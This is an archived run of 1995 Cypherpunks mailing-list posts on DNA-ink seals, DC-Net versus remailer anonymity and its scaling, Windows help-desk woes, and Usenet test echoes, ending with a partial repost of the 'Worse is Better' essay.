> 
> The same occured to me.
> 
> Perry
> 
The blood is water soluble and many of the componants breakdown over time. By
injecting DNA (which has lifetimes measured in millions of years) in some kind
of matrix (ie epoxy or cyanoacetates) it becomes possible to create a modern
'seal' similar to the wax seals of yesteryear. In the case of the old seals it
was not the wax which provided the protection but rather the symobigy that was
embedded in it (ie DNA).

And you thought that T Rex forward from the dinosaur mailing list about DNA
from dinosaur bones was unrelated to crypto......bwahahahahaha


                                                      Ravage
                                                       Black
                                                        Leather
                                                         Monster

ps You really should go take a look at the mathematics used to 'bridge' gaps
   in the DNA strands.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher E Stefan <flatline@u.washington.edu>
Date: Mon, 6 Feb 95 19:13:47 PST
To: Name Withheld By Request <cs000rrs@selway.umt.edu>
Subject: Re: alt.religion.your.operating.system.sucks
In-Reply-To: <Pine.ULT.3.91.950130063546.13138C-100000@selway.umt.edu>
Message-ID: <Pine.A32.3.91c.950206190403.47399A-100000@mead2.u.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 30 Jan 1995, Name Withheld By Request wrote:

> Does this stupid OS flamewar have *anything* to do with cypher? No.
> 
> Could it *PLEASE* be taken somewhere else?

Yea, like the UNIX-HATERS mailing list, or the appropriate 
comp.*.advocacy group.

I read this list to hear about *cypherpunks*, and while it is true that a 
good cypherpunk will write code, he/she should do so under the OS of 
his/her choice and not engage in OS holy wars.  There need to be good 
cypherpunk tools for *ALL* operating systems/enviroments, flaming people 
over their operating system is not a good way to accomplish this.

-- 
Christopher E Stefan  *  flatline@u.washington.edu  *  PGP 2.6ui key by request





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Mon, 6 Feb 95 19:58:14 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: "encrypt tcp connections" hacks
In-Reply-To: <9502061830.AA04828@snark.imsi.com>
Message-ID: <Pine.SV4.3.91.950206191208.28669C-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> Thats because the providers never package things up cleanly. If they
> sent a client on a disk, a la AOL, and they set things up to
> autoconfigure, they'd never need to speak to the clients.

    You've obviously never attempted to get a Windows product working for 
someone whose previous experience with a computer is limited to "Solitaire".

    I've done work with this ISP, and I can tell you it's nearly the most 
frustrating experience I've had in my life -- Windows has bizzare 
conflicts with software eating other software, ports getting set up 
wrong, and just general nastiness.  Even the slickest software needs 
helpline time - for whatever reason.

-jo

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Mon, 6 Feb 95 19:28:34 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: (dis)advantages of DC-Net vs remailers
Message-ID: <199502070328.AA11135@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

tcmay@netcom.com wrote:

> Chaumian digital mixes--what you Americans call "remailers"--mainly
> solves the sender anonymity problem. Message pools, or broadcast to a
> group or site that includes the receiver, mainly deals with receiver
> anonymity. The combination of the two deals with both.
> 
> Both are solved elegantly with the Dining Cryptographer's Protocol,
> about which much is written on this list every few months. Messages
> are "sent" in an Ouija-board fashion and received by the person who
> can successfully decrypt a public message sent over the system.

I tend to favor remailers + broadcasting + anonymous-return-addresss
over the DC-Net protocol.  Let me list some of their relative 
advantages and disadvantages.  Please add to these if you can think
of more...

Advantages of DC-Net over remailers

	- more flexible trust relationships - you can add your buddies to 
		the set of people who have to be compromised to trace you
	- lower latency - don't have to wait for remailers to collect enough 
		mail for batches
	- untracibility need not depend on assumptions about the enemy's
		computational power

Disadvantages of DC-Net

	- complexity - explaining the core concepts of a remailer takes only 
		a couple of lines, as opposed to a couple of screens for a DC-Net
		Implementation of a DC-Net seems to be an order of magnitude
		harder as well.
	- more vulnerable to denial of service attacks
	- MUCH higher bandwidth costs

I think over the long run the last factor will be most important.  In 
a DC-Net, for each bit one participant wants to send to another, EVERY
OTHER participant must broadcast a bit to ALL participants.  I can 
imagine a remailer-net with one million users, but I don't see any 
possibility that a DC-Net can be scaled to that size.

Wei Dai


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzboXjl0sXKgdnV5AQEqqAP+JU2sgiESnFZm+CCgNNboXnL3uKg0GP4Z
y6NV+U56yGvPKzsi9suUiOpbuzwsYVaMnWIuqRCOaxic75SFsDi0NvjE1K4JgyXz
aoyVs1i+xlFKnfmZr1+7EAheUq7wlfSWdp0cnAhbNWSrC3cSuDiNGYciJQLW8GGv
3YUvmW+Xoj0=
=Aa+t
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> singularity --> atoms --> macromolecules --> biological evolution
--> central nervous systems --> symbolic communication --> homo sapiens
--> digital computers --> internetworking --> close-coupled automation
--> broadband brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 6 Feb 95 20:18:10 PST
To: cypherpunks@toad.com
Subject: Re: New directions in anonymity (needed)
In-Reply-To: <199502060743.XAA01417@netcom14.netcom.com>
Message-ID: <199502070417.UAA18418@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: tcmay@netcom.com (Timothy C. May)
> Date: Sun, 5 Feb 1995 23:43:39 -0800 (PST)
> 
> Mike Ingle wrote:
> > All of our anonymous systems boil down to only two techniques: indirection
> > and broadcast. Indirection is sending a message through one or more
> > intermediate nodes to conceal its point of origin. Broadcast is sending a
> > message to multiple recipients to conceal the intended recipient.
> 
> First, I think it important to clearly distinguish between "sender
> anonymity," where the physical identity or sending site is hidden, and
> "receiver anonymity," where the same is true of the receiving site.

  I agree and will call them s anonymity, and r anonymity cause I am
too lazy to type much.

> Chaumian digital mixes--what you Americans call "remailers"--mainly
> solves the sender anonymity problem. Message pools, or broadcast to a
> group or site that includes the receiver, mainly deals with receiver
> anonymity. The combination of the two deals with both.

  I'll call the combo of "sender -> remail network -> pool ->
reciever" by the term "repool" in this message.

> Both are solved elegantly with the Dining Cryptographer's Protocol,
> about which much is written on this list every few months. Messages
> are "sent" in an Ouija-board fashion and received by the person who
> can successfully decrypt a public message sent over the system.

  Not so.  Though Chaum's DC protocol does give s/r anonymity, it does
so at a large cost.  Much larger than the repool protocol.

> > Broadcast is exactly as secure as it is nonscalable. If you
> > broadcast to 100 people, an attacker's uncertainty is one in
> > 100. The security grows linearly with the overall bandwidth. For
> > cryptographic-level security, it would need to grow exponentially
> > with bandwidth.

  I think this is exactly the right aproach.  So, lets look at the
cost of ataining anonymity.  For U people to communicate M bits (total
-- 2 people each sending 2 bits is M==4) s/r anonymously takes O(U*M)
bits multicast bandwidth for Chaum's DC protocol, but the repool
protocol uses only O(h*M) bits narowcast bandwidth plus O(M) bits
multicast bandwidth (Where h is the average number of remailer hops,
expected to be a constant wrt U and M, smaller than U, and much smaller
than M).

  Chaum's DC protocol also assumes an _interactive_ speed multicast
network.  Ouch!  The multicast internet protocol does help addresses
this problem, but it isn't widely available.  IRC is perhaps a bit
more expensize, more widely available, but lower bandwidth than
multicast IP packets.

> [...]
> > Anonymity needs something fundamentally new, something comparable to public
> > key for cryptography or blind signatures for digital cash. Suppose a server
> 
> I think you ought to carefully look at Chaum's work on Dining
> Cryptographers. It does all this. (It ain't perfect, and it ain't been
> implemented in practical terms, a la a "Pretty Good Dining
> Cryptographers," but it's at least as basic a concept as the other
> things are....some might say that all are variations on the same theme.)

  Chaum's DC protocol achieves U way s/r anonymity for U times the
work of sending a message.  Chaum's DC protocol provides s anonymity
as conditional as the cryptosystem achieves privacy (i.e.
uncomditional for one time pads, and dependant on 'strong
cryptosystems' assumption for the 'conventional' DC net).  Like the
repool protocol, it provides unconditional r anonymity.

  The repool protocol achieves U way s/r anonymity for no more than h
times the work of sending a message.  The repool protcol (by use of a
pool) provides unconditional (U-way) r anonymity, but (due to using
remailers) only provide conditional (U-way) s anonymity (conditional
on there existing at least one trusted remailer in the chain, and on
the existance of strong cryptosystems).  The repool protocol also
suffers from TA attacks like those sugested by Wei (at least as
currently implemented).

  What we would like is for the work to scale sub-linearly (ideally
exp(-U)) with the number of users U.  Said another way, we would like
U to scale faster than linearly as a function of the work (ideally
exp(W)).  If the effort of a protocol scales linearly (or worse) with
U, I don't think it will become widely employed.  Even better would be
a system which provided s/r anonymity without using multicast
bandwidths at all.  Btw, what is the cost of multicast v.s. narowcast
(say SMTP bassed) today on the net?

  Noyb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Mon, 6 Feb 95 20:46:27 PST
To: Wei Dai <weidai@eskimo.com>
Subject: Re: (dis)advantages of DC-Net vs remailers
In-Reply-To: <199502070328.AA11135@mail.eskimo.com>
Message-ID: <Pine.3.89.9502062012.A1613-0100000@netcom13>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Feb 1995, Wei Dai wrote:
 
> I think over the long run the last factor will be most important.  In 
> a DC-Net, for each bit one participant wants to send to another, EVERY
> OTHER participant must broadcast a bit to ALL participants.  I can 
> imagine a remailer-net with one million users, but I don't see any 
> possibility that a DC-Net can be scaled to that size.

Not so -- you merely have to broadcast to enough people.  
But then the topology, and hence the complexity, gets worse.

This however merely reduces the bandwidth waste from n^2 to n*lg(n)


A further wrinkle -- forming DC nets of DC nets, can reduce the
bandwidth waste to lg(n)^2, which should scale adequately to cover
the cosmos, but then the complexity gets really scary.

And when you try to figure how to deal with denial of service
attacks in a big DC net that tries to use bandwidth with
tolerable efficiency -- I don't know if anyone has figured out
what would be involved -- I certainly have not.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: usenet@agate.berkeley.edu (Usenet Administration)
Date: Mon, 6 Feb 95 20:49:57 PST
To: cypherpunks@toad.com
Subject: Automatic Echo of Test Posting
Message-ID: <199502070449.UAA23007@agate.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


This is an automatic echo of your posting to *.test.

Your header as received by this site follows.

If you don't want to get this message, please put the words "No Reply", 
or "Ignore" in the header of your posting.

        NNTP service with a :-)

rob robertson                agate!usenet             usenet@agate.berkeley.edu
-------------------------------------------------------------------------------

    Path: agate!overload.lbl.gov!emf.emf.net!hilbert.dnai.com!nbn!miwok!news.zeitgeist.net!ack.berkeley.edu!not-for-mail
    Subject: lwall
    Message-ID: <PINE4545-dhfsdkjc@ack.berkeley.edu>
    NNTP-Posting-Host: ack.berkeley.edu
    Organization: cypherpunks
    Lines: 2
    From: cypherpunks@toad.com
    Distribution: world
    Newsgroups: alt.test
    Date: 6 Feb 1995 19:34:19 GMT






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Mon, 6 Feb 95 20:55:55 PST
To: Jonathan Cooper <entropy@IntNet.net>
Subject: Re: "encrypt tcp connections" hacks
In-Reply-To: <Pine.SV4.3.91.950206191208.28669C-100000@xcalibur>
Message-ID: <Pine.3.89.9502062024.A1613-0100000@netcom13>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Feb 1995, Jonathan Cooper wrote:
>     You've obviously never attempted to get a Windows product working for 
> someone whose previous experience with a computer is limited to "Solitaire".
> 
>     I've done work with this ISP, and I can tell you it's nearly the most 
> frustrating experience I've had in my life -- Windows has bizzare 
> conflicts with software eating other software, ports getting set up 
> wrong, and just general nastiness.  Even the slickest software needs 
> helpline time - for whatever reason.

Some software needs more than others.

Central Points desktop for windows -- a very complex and powerful 
product, had quite low help line costs.

On the other hand the messy and confused windows internet utilities,
produced by diverse people, often crudely ported from Unix by 
shareware operators who could not afford the time and effort 
for a proper setup program, or crudely ported by people who may 
have been Unix experts but most obviously were not windows
experts, (example: ftp softwares terminal emulator) are a total 
disaster, and this is why the help cost for SLIP lines is so 
high.


 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 6 Feb 95 21:37:24 PST
To: cypherpunks@toad.com
Subject: Re: New directions in anonymity (needed)
Message-ID: <199502070522.VAA27293@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Noyb, anonymous-remailer@shell.portal.com
>   So, lets look at the
> cost of ataining anonymity.  For U people to communicate M bits (total
> -- 2 people each sending 2 bits is M==4) s/r anonymously takes O(U*M)
> bits multicast bandwidth for Chaum's DC protocol, but the repool
> protocol uses only O(h*M) bits narowcast bandwidth plus O(M) bits
> multicast bandwidth (Where h is the average number of remailer hops,
> expected to be a constant wrt U and M, smaller than U, and much smaller
> than M).

The repool could actually be somewhat worse than this.  Wei has
shown that if you don't send every tick then statistical information
builds up surprisingly quickly to link senders and probable receivers,
especially if there is a pair communicating frequently over a long period
of time, arguably one of the main forms of usage of these nets.  So
everyone has to send all the time at the rate of the maximum per-user
rate accepted by the remailers (say, one packet per tick).  If this rate
is considerably above the actual average communication rate of a given
user then this will be much higher than O(h*M) (although granted it will
not scale directly with U, increasing U will increase the desired packet
rate that would satisfy, say, 90% of users).

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Mon, 6 Feb 95 19:17:40 PST
To: Cypherpeople <cypherpunks@toad.com>
Subject: Remailer RFC
Message-ID: <Pine.SUN.3.91.950206221438.28091A-100000@unix3.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


[ I shouldn't be posting -- I'm legally not supposed to be on the net. 
But hell... ]

I've been compiling and editing a remailer standards document, following 
the format of the Internet RFCs [mainly because I think it's elegant]. 
I'd be glad to make it a `formal' RFC, registered with the IETF... But I 
have no idea how it's done. If anyone out there wants to tell me how...

Michael
--
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Mon, 6 Feb 95 20:23:16 PST
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Re: dna ink
In-Reply-To: <ab5ca280040210043eb1@[132.162.201.201]>
Message-ID: <199502070417.WAA01434@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
> Something I've been is: Why can't one of your enemies just get a piece of
> your hair or fingernails or something, and make their own DNA ink our of
> your DNA?  They could probably even send it to this DNA ink company, and
> they'd make your enemy ink out of your own DNA without even noticing.
> Doesn't seem very secure to me.
> 
> [Yeah, it's not crypto related, but I've been wondering about this since
> the topic was first brought up, and am somewhat surprised that of the few
> messages there were making fun of the DNA ink,  none mentioned this fact.
> Is that because it's too obvious to mention, or is there something I'm not
> thinking about which makes DNA ink useful after all?]
> 
> 
This is the same problem that arose with the original idea of seals once
the skills of metalworking became commen enough. By the 1500's it was
nearly impossible to keep a seal confidential more than a few weeks until
somebody got a impression and built a copy.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Mon, 6 Feb 95 20:26:25 PST
To: entropy@IntNet.net (Jonathan Cooper)
Subject: Re: "encrypt tcp connections" hacks
In-Reply-To: <Pine.SV4.3.91.950206191208.28669C-100000@xcalibur>
Message-ID: <199502070420.WAA01441@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


> 
>     You've obviously never attempted to get a Windows product working for 
> someone whose previous experience with a computer is limited to "Solitaire".
> 
>     I've done work with this ISP, and I can tell you it's nearly the most 
> frustrating experience I've had in my life -- Windows has bizzare 
> conflicts with software eating other software, ports getting set up 
> wrong, and just general nastiness.  Even the slickest software needs 
> helpline time - for whatever reason.
> 
I have been doing help desk related work for nearly 10 years and in my 
experience 'user friendly' is something you see on ads and never in the
software.

I have yet to see a piece of software that is useful and actually solves
a problem or does a job that doesn't also require an investment by the
help desk.

It simply ain't that easy.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Mon, 6 Feb 95 22:22:38 PST
To: weidai@eskimo.com
Subject: Re: a simple explanation of DC-Net
In-Reply-To: <199502070122.AA01568@mail.eskimo.com>
Message-ID: <199502070620.WAA29156@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Wei Dai wrote:

> The DC-Net is not very easy to understand.  I'll try to explain the most
> important parts of the concept as simply as I can.
...nice explanation elided...

> P.S.  I realize someone has probably written something like this
> already, but I hope this explanation helps someone who is still
> puzzled.  If nothing else, it serves as a sanity check on my own
> understanding.

Yes, I wrote up a similar explanation for the Extropians list, in
mid-1992, before our list existed. (It's been redistributed here a
couple of times, and is in some of the CP archives an/or URLs reported
here.)

Eric Hughes and I did a anthropomorphic demo of DC-Nets a couple of
years ago, at the first CP meeting. That is, we got up in front of
folks and literally acted-out a simple transmission (and even this
took some minutes, to make clear the protocols, etc.).

My estimate is that the averagely bright Cypherpunk (which is to say,
_very_ bright person) can get the key ideas of DC-Nets in a few hours
of careful thinking and diagramming of the ideas in the paper, which
is of course archived at the Cypherpunks site (and probably readily
accessible in several URLs). By "key ideas" I mean the first 3-4
pages of the paper, whjere the ideas are laid out.

Issues of collusion and disruption are what Chaum spends most of his
1988 paper on, and start after the first introductory pages. Sub-nets,
to reduce collusion, for example. Later papers, such as those by the
Pfitzmanns and by Jurgen Bos, deal in much more detail with
disruption.

(By the way, I mentioned to Chaum, in Monte Carlo last week, our
continuing fascination with DC-Nets, despite the difficulties in fully
implementing/using them. Chaum was aware of the efforts by the Austin
group, and was pleased to hear that several parallel are continuing. I
got the impression that we are the only people in the world still
looking at this stuff, which is not as bad as it sounds. You see,
those writing papers have moved on to other things, whereas
Cypherpunks is a list devoted to practical implementations and
demonstrations, and few others are, so we have a continuing interest.
Chaum was very complimentary about the Cypherpunks.)

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Mon, 6 Feb 95 20:02:51 PST
To: Wei Dai <weidai@eskimo.com>
Subject: Re: a simple explanation of DC-Net
In-Reply-To: <199502070122.AA01568@mail.eskimo.com>
Message-ID: <Pine.SUN.3.91.950206224622.21262B-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 6 Feb 1995, Wei Dai wrote:

> P.S.  I realize someone has probably written something like this
> already, but I hope this explanation helps someone who is still
> puzzled.

I've written a test-bed IRC client which uses DC Nets to allow multiple 
people to talk on an IRC channel anonymously.  It operates in a ring, 
with every participant showing his/her random bit stream with the 
neighbor to the "left."  Participants compare their bit stream with the 
one their neighbor shares with them, and broadcasts the differences 
(with lies indicating xmitted "1" bite) to all participants.  The 
difference bits for each round are totalled together modulo 2 by each 
participant, and any anonymous broadcasts can be determined from those 
totals.

My implementation was a quick project for a class and lacks some really 
important features:

1)  used built-in PRNG
2)  does not encrypt private messages for bit stream sharing between 
neighbors
3)  no ALOHA or similar protocol for dealing with message collisions
4)  ring could be expanded to more complex graph to increase number of
    colluding participants needed to break anonymity.

BTW - There have been a few other papers on DC-Nets since Chaum including 
detections of DC-Net disrupters, and protection against a group of active 
attacks.  I include a report with my code now available at 
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/applications/dc-irc.alpha.tar.gz
which goes into more details on these matters and has references.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Mon, 6 Feb 95 20:08:28 PST
To: root <cypherpunks@toad.com
Subject: Re: dna ink
Message-ID: <ab5ca280040210043eb1@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:39 PM 02/06/95, root wrote:
>The blood is water soluble and many of the componants breakdown over time. By
>injecting DNA (which has lifetimes measured in millions of years) in some kind
>of matrix (ie epoxy or cyanoacetates) it becomes possible to create a modern
>'seal' similar to the wax seals of yesteryear. In the case of the old seals it
>was not the wax which provided the protection but rather the symobigy that was
>embedded in it (ie DNA).
>
>And you thought that T Rex forward from the dinosaur mailing list about DNA
>from dinosaur bones was unrelated to crypto......bwahahahahaha

Something I've been is: Why can't one of your enemies just get a piece of
your hair or fingernails or something, and make their own DNA ink our of
your DNA?  They could probably even send it to this DNA ink company, and
they'd make your enemy ink out of your own DNA without even noticing.
Doesn't seem very secure to me.

[Yeah, it's not crypto related, but I've been wondering about this since
the topic was first brought up, and am somewhat surprised that of the few
messages there were making fun of the DNA ink,  none mentioned this fact.
Is that because it's too obvious to mention, or is there something I'm not
thinking about which makes DNA ink useful after all?]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MathWorks Autoresponder <usenet@mathworks.com>
Date: Mon, 6 Feb 95 20:50:18 PST
To: cypherpunks@toad.com
Subject: Re: lwall
Message-ID: <199502070450.XAA05997@turing.mathworks.com>
MIME-Version: 1.0
Content-Type: text/plain


Your Usenet test article was received on Mon Feb  6 23:50:01 EST 1995 here at 
The MathWorks, Inc. in Natick, MA.  Natick, MA is about 20 miles 
west of Boston, MA.

You are receiving this message because you posted a test message to one of
the *.test newsgroups.

The MathWorks' news admin can be reached via e-mail at usenet@mathworks.com.
Please note that we do not offer news access to sites outside of our
organization.

If you want to suppress this message in the future, include the word "ignore" 
in the Subject: header of any subsequent articles posted to *.test.  You could
also post your test articles with a Distribution: header of "local" to prevent
them from leaving your local machine, or you could also ask your local 
newsadmin to create a local *.test group that will not propagate outside of 
your organization.

All headers plus at most 10 lines of user text from your original article are
reproduced below for your perusal:

Path: news.mathworks.com!zombie.ncsc.mil!news.duke.edu!godot.cc.duq.edu!hudson.lm.com!news.pop.psu.edu!news.cac.psu.edu!howland.reston.ans.net!agate!overload.lbl.gov!emf.emf.net!hilbert.dnai.com!nbn!miwok!news.zeitgeist.net!ack.berkeley.edu!not-for-mail
Subject: lwall
Message-ID: <PINE4545-dhfsdkjc@ack.berkeley.edu>
NNTP-Posting-Host: ack.berkeley.edu
Organization: cypherpunks
Lines: 2
From: cypherpunks@toad.com
Distribution: world
Newsgroups: alt.test
Date: 6 Feb 1995 19:34:19 GMT




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Mon, 6 Feb 95 21:01:19 PST
To: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Subject: Re: dna ink
In-Reply-To: <ab5ca280040210043eb1@[132.162.201.201]>
Message-ID: <m0rbdOC-0009tFC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


...
> your DNA?  They could probably even send it to this DNA ink company, and
> they'd make your enemy ink out of your own DNA without even noticing.
> Doesn't seem very secure to me.
> 
> [Yeah, it's not crypto related, but I've been wondering about this since
> the topic was first brought up, and am somewhat surprised that of the few
> messages there were making fun of the DNA ink,  none mentioned this fact.
> Is that because it's too obvious to mention, or is there something I'm not
> thinking about which makes DNA ink useful after all?]
> 

A much more interesting spin on this would be a variety of ways to encode
throughout a substance in an inert but permanent way a public key.

Whether it's an easily identifiable molecule or some type of deep etching,
you could do things like mark all the parts of a car or all the paint,
fabric, plastic, etc. of a work of art.

DNA isn't very good really since it's mostly the same and based a lot
on probabilities.

sdw
-- 
Stephen D. Williams    25Feb1965 VW,OH      sdw@lig.net http://www.lig.net/sdw
Senior Consultant    513-865-9599 FAX/LIG   513.496.5223 OH Page BA Aug94-Feb95
OO R&D AI:NN/ES crypto     By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewall/WWW srvrs ICBM/GPS: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W wrk
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.28Jan95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stig@hackvan.com (Stig)
Date: Tue, 7 Feb 95 01:25:16 PST
To: Shad '94 list <aa982@freenet.buffalo.edu>
Subject: The Rise of "Worse is Better"...
Message-ID: <m0rbm8e-0006DaC@hackvan.com>
MIME-Version: 1.0
Content-Type: text/plain



A while ago, I mentioned appendix C to the _Unix-Haters Handbook_ and someone
(Jason?) was interested in it.  I couldn't come up with the text of the
chapter until now because I didn't have it until now.

Look through the Lisp-specific jargon to see what RPG (the author) has to
say about the differrent priorities in getting a job done...  One school of
engineering follows "The Right Thing" approach, while the other uses the
"Worse is Better" (quick-and-dirty) approach.

    Stig
    
I have the .tex file for the article, and it's available on the WWW as
    http://www.ai.mit.edu/articles/good-news/good-news.html

-----------------------------------------------------------------------------
[Image]  [Image] [Image]  Previous: Lisp's Apparent Failures Up: Lisp's
Apparent Failures Next: Good Lisp Programming is Hard

The Rise of ``Worse is Better''

I and just about every designer of Common Lisp and CLOS has had extreme
exposure to the MIT/Stanford style of design. The essence of this style can be
captured by the phrase ``the right thing.'' To such a designer it is important
to get all of the following characteristics right:

      Simplicity-the design must be simple, both in implementation and
     interface. It is more important for the interface to be simple than the
     implementation.

      Correctness-the design must be correct in all observable aspects.
     Incorrectness is simply not allowed.

      Consistency-the design must not be inconsistent. A design is allowed to
     be slightly less simple and less complete to avoid inconsistency.
     Consistency is as important as correctness.

      Completeness-the design must cover as many important situations as is
     practical. All reasonably expected cases must be covered. Simplicity is
     not allowed to overly reduce completeness.

I believe most people would agree that these are good characteristics. I will
call the use of this philosophy of design the ``MIT approach.'' Common Lisp
(with CLOS) and Scheme represent the MIT approach to design and implementation.

The worse-is-better philosophy is only slightly different:

      Simplicity-the design must be simple, both in implementation and
     interface. It is more important for the implementation to be simple than
     the interface. Simplicity is the most important consideration in a design.

      Correctness-the design must be correct in all observable aspects. It is
     slightly better to be simple than correct.

      Consistency-the design must not be overly inconsistent. Consistency can
     be sacrificed for simplicity in some cases, but it is better to drop those
     parts of the design that deal with less common circumstances than to
     introduce either implementational complexity or inconsistency.

      Completeness-the design must cover as many important situations as is
     practical. All reasonably expected cases should be covered. Completeness
     can be sacrificed in favor of any other quality. In fact, completeness
     must sacrificed whenever implementation simplicity is jeopardized.
     Consistency can be sacrificed to achieve completeness if simplicity is
     retained; especially worthless is consistency of interface.

Early Unix and C are examples of the use of this school of design, and I will
call the use of this design strategy the ``New Jersey approach.'' I have
intentionally caricatured the worse-is-better philosophy to convince you that
it is obviously a bad philosophy and that the New Jersey approach is a bad
approach.

However, I believe that worse-is-better, even in its strawman form, has better
survival characteristics than the-right-thing, and that the New Jersey approach
when used for software is a better approach than the MIT approach.

Let me start out by retelling a story that shows that the MIT/New-Jersey
distinction is valid and that proponents of each philosophy actually believe
their philosophy is better.

Two famous people, one from MIT and another from Berkeley (but working on Unix)
once met to discuss operating system issues. The person from MIT was
knowledgeable about ITS (the MIT AI Lab operating system) and had been reading
the Unix sources. He was interested in how Unix solved the PC loser-ing
problem. The PC loser-ing problem occurs when a user program invokes a system
routine to perform a lengthy operation that might have significant state, such
as IO buffers. If an interrupt occurs during the operation, the state of the
user program must be saved. Because the invocation of the system routine is
usually a single instruction, the PC of the user program does not adequately
capture the state of the process. The system routine must either back out or
press forward. The right thing is to back out and restore the user program PC
to the instruction that invoked the system routine so that resumption of the
user program after the interrupt, for example, re-enters the system routine. It
is called ``PC loser-ing'' because the PC is being coerced into ``loser mode,''
where ``loser'' is the affectionate name for ``user'' at MIT.

The MIT guy did not see any code that handled this case and asked the New
Jersey guy how the problem was handled. The New Jersey guy said that the Unix
folks were aware of the problem, but the solution was for the system routine to
always finish, but sometimes an error code would be returned that signaled that
the system routine had failed to complete its action. A correct user program,
then, had to check the error code to determine whether to simply try the system
routine again. The MIT guy did not like this solution because it was not the
right thing.

The New Jersey guy said that the Unix solution was right because the design
philosophy of Unix was simplicity and that the right thing was too complex.
Besides, programmers could easily insert this extra test and loop. The MIT guy
pointed out that the implementation was simple but the interface to the
functionality was complex. The New Jersey guy said that the right tradeoff has
been selected in Unix-namely, implementation simplicity was more important than
interface simplicity.

The MIT guy then muttered that sometimes it takes a tough man to make a tender
chicken, but the New Jersey guy didn't understand (I'm not sure I do either).

Now I want to argue that worse-is-better is better. C is a programming language
designed for writing Unix, and it was designed using the New Jersey approach. C
is therefore a language for which it is easy to write a decent compiler, and it
requires the programmer to write text that is easy for the compiler to
